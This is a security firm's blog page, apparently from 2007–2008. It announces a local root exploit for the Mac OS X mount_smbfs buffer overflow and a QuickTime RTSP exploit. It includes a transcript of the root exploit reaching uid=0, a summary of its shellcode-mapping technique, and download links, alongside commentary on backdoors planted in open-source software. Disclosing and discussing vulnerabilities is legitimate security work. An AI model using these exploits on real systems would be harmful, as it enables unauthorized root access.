Even if time for keeping this blog updated is becoming rather scarce, we couldn’t resist publishing a note about Quicktime again. It was on the news some time ago, due to another simple, classical stack buffer overflow flaw. It was related with RTSP interfaces again.

Our exploit pack already provides a reliable exploit against this and other recent flaws, and there’s no real exploit for this flaw publicly available (in terms of quality and reliability). It’s quite possible that so-called drive-by malware installation kits are making use of this flaw to infect unsuspecting users.

We expected Apple to perform some due diligence with Quicktime’s QA, since the last real 1990 style flaws have been all related to RTSP functionality, but looks like they are still missing some guidance. Hopefully it won’t take long for them to realize that something like SDL could significantly improve their product security.

We are happy to announce the availability of a 100% reliable exploit against CVE-2007-3876, the mount_smbfs argument stack-based buffer overflow. Using the shared_region_map_file_np() system call, we map a file containing shellcode at a fixed location, with write, read and execute permissions (VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE). This technique was first documented publicly in a Phrack article by nemo, and has been partially restricted in Leopard.
On an unpatched Mac OS X 10.4 installation (only without the update fixing this problem) it will allow any user to gain root privileges.

$ ./mount_smbfs_root
Mac OS X 10.4.10, 10.4.11 mount_smbfs Local Root exploit
Copyright (c) 2007-2008 Subreption LLC. All rights reserved.
Mapping shellcode from file via shared_region_map_file_np()...
Shellcode mapped: mapping starts at 0x9ffff000, shellcode at 9fffff71
Payload size: 1064 (1040 padding bytes), Return address: 0x9fffff71
mount_smbfs: workgroup name 'AAAA...'
malcomx:/Users/nonpriv root# id
uid=0(root) gid=501(nonpriv) groups=501(nonpriv), 81(appserveradm), 79(appserverusr), 80(admin)
malcomx:/Users/nonpriv root# exit
exit

It is available at our corporate public repository, as well as the Milw0rm website.

• Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit (At Subreption public repository)
• Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit (Mirror)
• The original Ruby proof of concept: mount_smbfs_root.rb

Starting January 2008, our focus will be set on the development and polishing of a commercial exploit code and penetration-testing toolset, comprising several reliable exploits and tools to aid security professionals in penetration-tests, IDS and HIPS developers, as well as serving as an educational resource on exploit techniques, IDS evasion and general information security for the Mac OS X, Solaris, Linux and Microsoft Windows platforms, from a strictly technical perspective.

We are interested on partnerships with prospective security vendors and especially companies with strong focus on research and a consistent record of developing innovative, technically complex security work. For more information, you can contact us at . We will carefully examine all offers on a case-by-case basis.

Every now and then, the news talk about some Open Source software package that has been compromised (as in backdoored: tampered to include code or functionality that opens its users to abuse from third-parties). A few days ago it was SquirrelMail, in March it was the massively extended Wordpress blogging software.

• Hackers plant backdoor in blogging software, at The Register
• Intruder adds back door to WordPress blog software, at ZDNet
• WordPress Distribution Compromised, Update Released, at Netcraft
• Attacker adds backdoor to WordPress blog software, at ITWire

In 2003, the Linux kernel itself experienced a compromise that resulted in a very subtle, discreet backdoor added to the source code of the sys_wait4() function, which allowed privilege escalation to gain root level access. Debian, GNU Project and Gentoo servers and distribution sites have been targets of successful attacks, and the CVS project server was attacked in 2004. Recently, Ubuntu community-hosted servers were compromised as well.

In 2002, IRSSI (the IRC client) and several network security tools hosted at Monkey.org were modified to contain backdoors that activated during compilation time.

All your base are belong to us.

Some languages are more prone to be subtly manipulated for implementing hostile functionality: C conditional statements and variable assignment, incorrect use of operators… in PHP we have the preg_replace function and other possibilities. Also some object oriented languages allow class methods and functions to be intercepted easily, like Objective-C.

In the Linux kernel case, it could have been well identified as a typo. The fact that there are sophisticated attackers out there, who inspect and dive into the target before making the definitive move, is certainly not a common threat. In the words of the BitMover founder, Larry McVoy (in an article for SecurityFocus):

“Whoever did this knew what they were doing. They had to find some flags that could be passed to the system without causing an error, and yet are not normally passed together… There isn’t any way that somebody could casually come in, not know about UNIX, not know the Linux kernel code, and make this change. Not a chance.”

The security industry itself is normally driven by trends, and nowadays the trend is about defacements, unsophisticated attacks and propaganda tools. The real threats aren’t botnets or Brazilian defacement script-kiddies.

One of the main disadvantages that affect open source projects, is the fact that their development resources are far more exposed than those of proprietary vendors. It’s easy to audit the software powering their version controlled repository, their issue and bug tracking application, their mail server daemon (hopefully it’s Qmail!), etc. While closed source applications are also exposed in other manners, an open source project depends entirely on an open development model which has its own (security) weaknesses.

There’s no real way to enforce legal obligations and rights for each developer (the insider threat: a rogue developer adding a backdoor himself), without making agreements and other paperwork effective.

While we wouldn’t release exploit code under normal circumstances, we are pretty much emerging and wanted to show an example of our work. Since this vulnerability was already public, and the Apple security people are most probably working on an imminent update to Quicktime, potential attackers have a limited time-span to abuse it.

Hopefully Apple will speed up on this one and release an update to fix the vulnerability. We enjoy the versatility of Mac OS X on daily basis, and want it to be as more secure as possible.

Thanks to Kevin Finisterre for the testing environment and proofing of the exploit on PowerPC. Thanks to HD Moore for suggestions and the Metasploit project.

The exploit code is available at: static.subreption.com/public/exploits/qtimertsp_redux.rb

Some improvements that might be released:

• Better PowerPC target information.
• Reliable Microsoft Windows Vista target.
• Reliabe Leopard target for x86.

Continue reading →

Finally we decided that Mephisto wasn’t yet the right solution for us, and until we have time to develop a proper blog engine in place, we are going to keep this going. We are damn busy at the moment, hence why our time for blogging is really limited. But we’ll try to keep interesting news around, stay tuned .

We are sorry about the not-so impressive looking current design, but this is being worked on behind the scenes. Hopefully the design guy will come up with some fresh ideas, he’s still busy working on the corporate site. Although, developing with Rails is never boring (well, just unlikely ).